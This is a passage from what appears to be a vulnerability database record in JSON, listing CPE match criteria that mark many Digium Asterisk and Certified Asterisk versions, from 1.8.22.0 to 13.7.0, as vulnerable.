              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E0ABBB2C-19EC-4D6C-A1EA-AEF0ABA4123D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0787BC7B-9464-4AAA-896B-C028ECF8E397",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "84C0FBC8-9CD1-4135-94C7-BE90A7C94625",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "981F3994-392D-47DB-97DA-AC15BA070A36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "94691EE6-266F-46CE-B388-0289EB39D91A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FD3948A1-B5A6-4702-9187-A7720E81B7F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BC097BB6-02E9-4F48-98CB-B5F31B41009C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C2FD962-B1D5-41E5-884E-0C3F7F9DACE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "096E966A-878B-426F-AB40-BB476B17B969",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "852DAF2A-86F3-4D05-91DC-6A2FBC214736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7D721486-3043-4380-A73C-44B4DD0E34C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F29E2EE-B6E8-4E55-84A8-3BD0658387EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "837BF2BD-814F-4503-91DF-EE16B5A4921D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "15FCDDB3-62D8-446C-B57C-F3BBFBD13491",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.25.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03512BDE-E441-46F6-88B7-16A2468CA199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902CAF9D-9D02-47FA-AE2E-EC1268A32BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "80AD87B5-B796-4C44-8A6D-0B22AA2903CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D87B2B3-E40B-4BF7-91E6-3B3F9CA28719",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2575F7A4-E1F1-4836-A467-076EDD8484B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBDFAFA3-A52F-4FC8-BA51-FE52D5F57DD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.27.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6085E437-87B8-4355-BDC0-A14EA4F52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C44D1ED-2435-4042-BF15-3D752BE0C661",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "23E4CE5C-375C-4ECB-A4D9-A5A6805E5FE0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "236D459B-ED50-4A2F-B463-D2F9DD1C7E8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.28.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9EEB00A-68B0-4CDE-B625-AB83B1D6D2F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.32.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "72195459-404F-423E-A78C-DE2A728AFDA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A62DFFE-637B-4911-B3B4-6DA4053CBDBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "96C7950F-41D1-46B5-BA62-E8450CB81244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C9A32ECC-E208-4834-8EF7-FEF7A3495041",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F7C5D35-A6AE-4A2E-98C5-CB58FF22AF08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AA3E0D41-2E6E-4294-8E56-1A738A7F9AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D16109B8-4CDF-46FC-9AD9-A158E532791B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F5EE428-98FF-42BC-9F61-311327B8F610",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBA2FD08-D761-410F-9804-A76F0DD77349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74B34C21-D90B-4E32-BBA6-7773DB663F18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D3AF185-7AC6-491E-9BE0-8ECD163A3E77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "90996D49-5731-4F7D-9DBE-D0599A5D85A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D3C91C8D-707D-443D-985F-FA3EDB181208",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "25E7F7F5-E85A-4720-B5C9-2B776B04D904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8DD16DF-C47C-41CF-8CDE-C365103262A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "43C06F98-62F4-4008-A463-2791BEDF6DED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B98A2EA6-DCC6-4F8B-B132-6692AED16CF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "672EDC0E-D70A-4BB0-B7FE-5D422C737862",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C779E0D4-0375-4BE8-9667-A32C68B66D60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:standard:*:*:*",
              "matchCriteriaId": "6DEF3D58-73E0-402A-A15F-05CA72B5B288",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8E9E50F8-0123-4C9E-88E1-5DCE08770B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F7C605A3-8517-4215-9AD3-980D587B22DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "866815AE-D1FE-460C-A3BC-70C251655C1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "44746060-BC6F-4E6D-BA81-61623B2D27FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47548ADE-255A-4355-BD06-1FEF134C1620",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "ABCFC4D9-8054-4F42-BE7E-5092F6648F95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "84A7DBB5-999C-4AE8-BC5D-F0C5F77957DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB1EA7C5-CE37-4A7E-AF81-636228F3BA53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "905722CB-4B6C-4849-88CD-22E972432E36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10823FD4-D618-4050-91D7-CBDE69BC570D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:-:*:*:*:*:*:*",
              "matchCriteriaId": "96463965-1F99-42DB-9745-5B4E49A48F40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:lts:*:*:*",
              "matchCriteriaId": "BB47EA31-CF9D-4752-804B-7804151EC87C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:lts:*:*:*",
              "matchCriteriaId": "A1C9B744-1745-4E9D-A2DE-4659295508D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
